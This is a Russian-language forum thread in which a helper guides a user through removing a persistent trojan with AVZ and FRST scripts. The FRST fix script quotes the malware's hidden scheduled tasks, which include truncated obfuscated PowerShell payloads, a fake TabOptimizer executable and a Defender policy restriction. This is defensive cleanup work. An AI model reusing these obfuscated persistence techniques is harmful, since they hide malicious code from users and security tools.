MEM:Trojan.Win64.Generic.mem никак не удаляет.Помогите

[denis163]

здравствуйте нагружает систему но после открытия диспетчера задач все возвращается в норму.Касперский видит вроде как удаляет но он появляется снова

[denis163]

CollectionLog-2022.07.21-01.08.zip

[Sandor]

Здравствуйте!

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 QuarantineFile('C:\Users\User\AppData\Local\Temp\TabOptimizer.exe', '');
 DeleteSchedulerTask('C:\WINDOWS\Task\TabOptimizer.job');
 DeleteSchedulerTask('Microsoft\Windows\BrokerInfrastructure\BrokerInfrastructure');
 DeleteSchedulerTask('Microsoft\Windows\Maintenance\007');
 DeleteSchedulerTask('Microsoft\Windows\MUI\1026252539');
 DeleteSchedulerTask('Microsoft\Windows\MUI\66719349');
 DeleteSchedulerTask('TabOptimizer');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

 

Компьютер перезагрузится.

 

Через Панель управления - Удаление программ удалите нежелательное ПО:

Цитата

 

Web Companion

WebAdvisor от McAfee

 

а также устаревшую

Цитата

Java 8 Update 51 (64-bit)

 

 

Файл CheckBrowserLnk.log
 из папки

...\AutoLogger\CheckBrowserLnk

перетащите на утилиту ClearLNK.

Отчёт о работе в виде файла ClearLNK-<Дата>.log прикрепите к вашему следующему сообщению.
 

 

 

Для повторной диагностики запустите снова AutoLogger и прикрепите новый CollectionLog.

[denis163]

здравствуйте все сделал как написали.Вот что получилось

ClearLNK-2022.07.21_11.44.18.log

[Sandor]

2 часа назад, Sandor сказал:

Для повторной диагностики запустите снова AutoLogger и прикрепите новый CollectionLog.

Жду.

[denis163]

вот.повторная диагностика

CollectionLog-2022.07.21-19.47.zip

[Sandor]

Дополнительно:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

[denis163]

здравствуйте выполнил сканирование.Вот отчеты

Addition.txt FRST.txt

 

уничтожен вирус или нет еще?(

[Sandor]

Пока нет.

 

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

• Отключите до перезагрузки антивирус.
• Выделите следующий код:

  Start::
  CloseProcesses:
  SystemRestore: On
  CreateRestorePoint:
  HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
  HKU\S-1-5-21-3002140121-1951146052-1628529435-1001\...\MountPoints2: {64ed2e33-80ee-11ec-8fd7-706655c0bc12} - "D:\HiSuiteDownLoader.exe" 
  HKU\S-1-5-21-3002140121-1951146052-1628529435-1001\...\MountPoints2: {64ed2e58-80ee-11ec-8fd7-706655c0bc12} - "D:\HiSuiteDownLoader.exe" 
  HKU\S-1-5-21-3002140121-1951146052-1628529435-1001\...\MountPoints2: {925520ed-675e-11eb-8f73-706655c0bc12} - "D:\Setup.exe" 
  Task: {17E218FD-3E5A-42A0-AB3C-C81A0C8C9885} - System32\Tasks\Microsoft\Windows\MUI\66719349 => powershell.exe -c "qMTuBPZQT;OZIWt;$GXkVu='znnWeqgOa)WbeVxEcEfavrfUlD.o(CigiC';$KVZZB=$GXkVu[30]+$GXkVu[4]+$GXkVu[14];$lWnhE='0&(2gchm fA*=-T(y*_).1Na?me4 (_''/gusfoi6nn_g _]S+ytast1cesmgb;up{s,il6ng0_ _S2_ys_qthe_,m.w1I)Oud;u}0s5isbng_5 qS_iysjmt]ebmm.(fRzu_6nt?si.m__e.ejI,n!_tevdrwoanpShie8r0cvi.?c_e__s;,+u[s(_i (запись имеет ещё 2391 символов).
  Task: {535EC0F1-EA94-4A9D-B997-389E57A8043C} - System32\Tasks\TabOptimizer => C:\Users\User\AppData\Local\Temp\TabOptimizer.exe -fxmudc -zyapku -sxq (Нет файла) <==== ВНИМАНИЕ
  Task: {6D53D9C0-D3F7-4C09-9F45-F08B00E8FFEF} - System32\Tasks\Microsoft\Windows\BrokerInfrastructure\BrokerInfrastructure => powershell.exe -c "$jMKX='u322UqxRv2fSC5w/2TC0IrolvHrYL/kX1TKbCp0BnDWjG4h7lXunKPJmoDKebagSlxnuSNpXvCHOUMQ/pVTISrw80kvHTJM6rnucdPtKtDGaDJcX93GkcvMv5w2dZYwFyxGQEMUZsEyTQawO+3+de+N5k0PxG4gBi26VSN1nu0CYWa1hiQqQP7Maxz+jB+xg7h22XY13qDKeArpm/Wf9bexX31vfEp0cjQXQRp08y0aJIbF65QngU/sRlF2dBJET8gOMXK5pnQiPdKxAjErbfJUQvQ+Dafguy (запись имеет ещё 3111 символов).
  Task: {A8EF12FA-8535-46CD-989B-C20BB33DCB8F} - System32\Tasks\Microsoft\Windows\MUI\1026252539 => powershell.exe -c "KjfaBGxf;weJl;jNCe;jAQKfCsI;Ubfmeu;$zKVs='efeErg)pxCsZYcESQzaTBlYfbc.D(Eiq';$UjOEJ=$zKVs[30]+$zKVs[0]+$zKVs[8];$uGau='}&(egcym gA*_-T=y*o).!Na_me6 (,''y7us[_ign_mg _1S9ya/st[vezmo2;u}0s_i/_ngy0 kS__ysmftge1_m.t1I}O02;u6fs[i53ngh_ _Sm!ysyyt=ewam.g)R6u[1ntr_iqmk7e.d4I_nmwteilruouypS+_erreuvi_=c3e4 (запись имеет ещё 2230 символов).
  Task: {BF57F54A-ADAF-4A74-920B-1B5C0B599C35} - System32\Tasks\Microsoft\Windows\Maintenance\007 => powershell.exe -c "cSEX;ASSGEmmg;IAwpfP;ShfgfkZ;$strt='yteXBGq)hxbwckElaAlXPve.yTjb(sTiWwua';$taSCy=$strt[31]+$strt[2]+$strt[9];$rFfOD='5&(]gc7m 6A*y-T=y*j)._Na[mer (o'')/usk-ibnh=g rdSty[[st7_e_m.k;ud_sdi0+ng0, vS_.ysr5tvexbm.x_IcOre;uz_s1i)ang__ [S_bysk0tueedm.__Rdui7ntjoilm20e.ghI7nljte+_rco9_pSs4eqrn0vi__cbe_j (запись имеет ещё 2481 символов).
  Task: C:\WINDOWS\Tasks\TabOptimizer.job => C:\Users\User\AppData\Local\Temp\TabOptimizer.exe
  S1 WinSetupMon; system32\DRIVERS\WinSetupMon.sys [X]
  AlternateDataStreams: C:\Users\User\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
  AlternateDataStreams: C:\Users\User\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
  FirewallRules: [{0477c604-6719-4d96-9d31-153e8125228c}] => (Block) LPort=14433
  ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
  EmptyTemp:
  Reboot:
  End::

   

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

[denis163]

сделал.

Fixlog.txt

[Sandor]

Что сейчас с проблемой?

[denis163]

Сейчас сделал проверку угроз не обнаружено.Спасибо большое вам очень выручили.

[Sandor]

Отлично. В завершение проделайте следующее:

 

1.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.
 

2.

• Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
• Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10/11)
• Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
• Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
• Прикрепите этот файл к своему следующему сообщению.